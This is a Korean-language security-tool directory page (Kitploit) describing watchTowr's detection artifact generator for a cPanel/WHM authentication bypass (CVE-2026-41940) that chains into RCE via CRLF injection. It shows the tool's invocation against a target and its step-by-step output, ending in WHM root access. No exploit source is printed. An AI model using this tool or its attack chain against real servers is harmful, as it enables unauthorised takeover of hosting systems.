Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
watchTowr-vs-cPanel-WHM-AuthBypass-to-RCE.py — WHM 관리자 인터페이스를 대상으로 cPanel/WHM 인증 우회(CVE-2026-41940)를 검증하고 CRLF 주입을 통한 RCE를 시연하는 탐지 아티팩트 생성기. | Kitploit
도구/GitHubGitHub/watchtowrlabs/watchtowr-vs-cpanel-whm-authbypass-to-rce.py
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringWeb SecurityPenetration Testing
GitHubwatchtowrlabs/watchtowr-vs-cpanel-whm-authbypass-to-rce.py

watchTowr-vs-cPanel-WHM-AuthBypass-to-RCE.py

WHM 관리자 인터페이스를 대상으로 cPanel/WHM 인증 우회(CVE-2026-41940)를 검증하고 CRLF 주입을 통한 RCE를 시연하는 탐지 아티팩트 생성기.

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
4161023개월 전Kitploit 검토 완료

cve-2026-41940 cPanel/WHM 인증 우회 - 탐지 아티팩트 생성기

cPanel/WHM 인증 우회 탐지 아티팩트 생성기 도구

설명

이 탐지 아티팩트 생성기는 cPanel/WHM이 최근 인증 우회에 취약한지 확인합니다.

동작 데모

취약한 인스턴스를 대상으로 테스트:

root@kitploit:~
python authbypass-RCE.py --target https://target:2087/ 
                     __         ___  ___________
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|
                          \/          \/     \/

        watchTowr-vs-cPanel-WHM-AuthBypass-to-RCE.py

        (*) cPanel/WHM Authentication Bypass - Detection Artifact Generator

          - Sina Kheirkhah (@SinSinology) of watchTowr (@watchTowrcyber)

        CVEs: [CVE-2026-Pending]

[0] hostname = 
[1] minting a preauth session...
    session base = :vQ2WC5Bexp0oFSa7
[2] sending the CRLF injection (Basic auth + no-ob cookie)...
    HTTP 307, leaked token = /cpsess5691070609
[3] firing do_token_denied to propagate raw -> cache...
    HTTP 401, gadget fired
[4] verifying we're WHM root...
    /json-api/version -> HTTP 200  {"version":"11.110.0.89"}

영향을 받는 버전

cPanel 웹사이트를 여기에서 참조하세요.

watchTowr 연구소 팔로우

최신 보안 연구를 위해 watchTowr 연구소 팀을 팔로우하세요.

  • https://labs.watchtowr.com/

  • https://x.com/watchtowrcyber

도구 다운로드